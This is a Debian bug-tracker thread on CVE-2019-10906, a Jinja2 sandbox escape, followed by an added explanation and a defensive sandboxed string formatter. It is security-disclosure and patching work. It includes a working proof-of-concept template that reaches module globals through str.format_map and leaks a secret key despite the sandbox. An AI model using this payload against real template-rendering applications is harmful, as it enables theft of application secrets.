Bug#926602: CVE-2019-10906 - jinja sandbox escape poc

2019-04-08 Thread Salvatore Bonaccorso
Hi Hugo,

On Mon, Apr 08, 2019 at 10:20:29PM +0200, Hugo Lefeuvre wrote:
> Hi Salvatore,
> 
> > CVE-2016-10745 was assigned for this issue.
> 
> Thanks for the information.
> 
> I just noticed you added CVE-2016-10745 to the tracker. I am fairly
> confused; do you know why this CVE was not referenced in the tracker?
> Or did you just request it?

It was not referenced, because there was no CVE yet. I was irritated
that for the later issue apparently a CVE was assigned, but not for
the original first issue, so I requested a CVE for it.

It would have shown up on the next CVE list update, but given I got the
confirmation from MITRE on the assignment I then already added it to
the tracker.

So in short, yes I did request the CVE and it was assigned yesterday.

Regards,
Salvatore



Bug#926602: CVE-2019-10906 - jinja sandbox escape poc

2019-04-08 Thread Hugo Lefeuvre
Hi Salvatore,

> CVE-2016-10745 was assigned for this issue.

Thanks for the information.

I just noticed you added CVE-2016-10745 to the tracker. I am fairly
confused; do you know why this CVE was not referenced in the tracker?
Or did you just request it?

cheers,
Hugo

-- 
Hugo Lefeuvre (hle)|www.owl.eu.com
RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD
ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C




Bug#926602: CVE-2019-10906 - jinja sandbox escape poc

2019-04-08 Thread Salvatore Bonaccorso
Hi Hugo,

On Mon, Apr 08, 2019 at 10:04:35AM +0200, Hugo Lefeuvre wrote:
> > This should help confirming vulnerability in other suites.
> 
> 2.7.3-1 and all later releases are affected. In addition, both 2.7.3-1 and
> 2.8-1 are affected by the previous str.format issue [0].
> 
> [0] https://palletsprojects.com/blog/jinja-281-released/

CVE-2016-10745 was assigned for this issue.

Regards,
Salvatore



Bug#926602: CVE-2019-10906 - jinja sandbox escape poc

2019-04-08 Thread Hugo Lefeuvre
> This should help confirming vulnerability in other suites.

2.7.3-1 and all later releases are affected. In addition, both 2.7.3-1 and
2.8-1 are affected by the previous str.format issue [0].

[0] https://palletsprojects.com/blog/jinja-281-released/



Bug#926602: CVE-2019-10906 - jinja sandbox escape poc

2019-04-08 Thread Hugo Lefeuvre
Hi,

I'm working on a potential jinja2 Debian LTS security update. Here is a
proof of concept which allows the issue to be reproduced easily. This
should help confirm the vulnerability in other suites.

>>> from jinja2.sandbox import SandboxedEnvironment
>>> env = SandboxedEnvironment()
>>> config = {'SECRET_KEY': '12345'}
>>> class User(object):
...     def __init__(self, name):
...         self.name = name
...
>>> t = env.from_string('{{ "{x.__class__.__init__.__globals__[config]}".format_map(dic) }}')
>>> t.render(dic={"x": User('joe')})
"{'SECRET_KEY': '12345'}"

Expected behaviour would be jinja2.exceptions.SecurityError.

Adapted from [0].

regards,
 Hugo

[0] https://palletsprojects.com/blog/jinja-281-released/

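The proof of concept above works because str.format's replacement-field syntax follows attribute and item lookups on its own, so a sandbox that checks attribute access on template expressions but lets the template call str.format_map unchecked is bypassed. The following is an added example, not code from the bug report and not Jinja's own implementation: a minimal formatter in the spirit of the approach the linked 2.8.1 release notes describe, where format calls are routed through a string.Formatter subclass that applies the sandbox's attribute policy to every step of the field. The names SandboxedFormatter, SecurityError, render_unsandboxed, render_sandboxed and is_blocked are this example's own (SecurityError here is not jinja2's exception class), and config and User are constructed stand-ins mirroring the report.

```python
import re
import string


class SecurityError(Exception):
    """Raised when a format field tries to follow an attribute the policy forbids."""


# Constructed stand-in for an application's configuration; it is reachable
# from any object defined in this module via __init__.__globals__.
config = {'SECRET_KEY': '12345'}


class User(object):
    def __init__(self, name):
        self.name = name


# The replacement field from the bug report: it walks from a harmless object
# to the module globals that hold `config`.
LEAK_TEMPLATE = "{x.__class__.__init__.__globals__[config]}"

# One ".attr" or "[key]" step of a replacement field, as str.format parses it.
_STEP = re.compile(r'\.([^.\[]+)|\[([^\]]*)\]')


class SandboxedFormatter(string.Formatter):
    """A str.format replacement in which every attribute and item step of a
    replacement field is checked before it is followed. The policy is the
    usual sandbox rule: no attribute whose name starts with an underscore."""

    def is_safe_attribute(self, obj, attr):
        return not attr.startswith('_')

    def get_field(self, field_name, args, kwargs):
        head = re.match(r'[^.\[]*', field_name)
        first = head.group(0)
        if first == '':
            raise ValueError('missing argument name in field %r' % field_name)
        obj = self.get_value(int(first) if first.isdigit() else first, args, kwargs)
        pos = head.end()
        for step in _STEP.finditer(field_name, pos):
            if step.start() != pos:
                raise ValueError('malformed field %r' % field_name)
            attr, key = step.group(1), step.group(2)
            if attr is not None:
                if not self.is_safe_attribute(obj, attr):
                    raise SecurityError('access to attribute %r of %s is unsafe'
                                        % (attr, type(obj).__name__))
                obj = getattr(obj, attr)
            else:
                # str.format treats an all-digit key as an integer index.
                obj = obj[int(key) if key.isdigit() else key]
            pos = step.end()
        if pos != len(field_name):
            raise ValueError('malformed field %r' % field_name)
        return obj, first


def render_unsandboxed(template, mapping):
    """What the vulnerable path amounts to: str.format_map with no checks."""
    return template.format_map(mapping)


def render_sandboxed(template, mapping):
    """The hardened path: same format syntax, but every lookup is mediated."""
    return SandboxedFormatter().vformat(template, (), mapping)


def is_blocked(template, mapping):
    """True when the sandboxed formatter refuses the template."""
    try:
        render_sandboxed(template, mapping)
    except SecurityError:
        return True
    return False


if __name__ == '__main__':
    joe = {'x': User('joe')}
    print(render_unsandboxed(LEAK_TEMPLATE, joe))   # the config dict leaks
    print(render_sandboxed("Hello {x.name}!", joe))  # Hello joe!
    print(is_blocked(LEAK_TEMPLATE, joe))            # True
```

The point of the design is that the policy is applied per step rather than to the final value: `x.name` is allowed, `x.__class__` is refused before anything further is followed, and ordinary item access such as `{x[name]}` on a mapping still works. A real sandbox also has to route the other string methods that take format syntax (str.format itself, and any formatter used for autoescaping) through the same check, which is what makes the fix more than a one-line change.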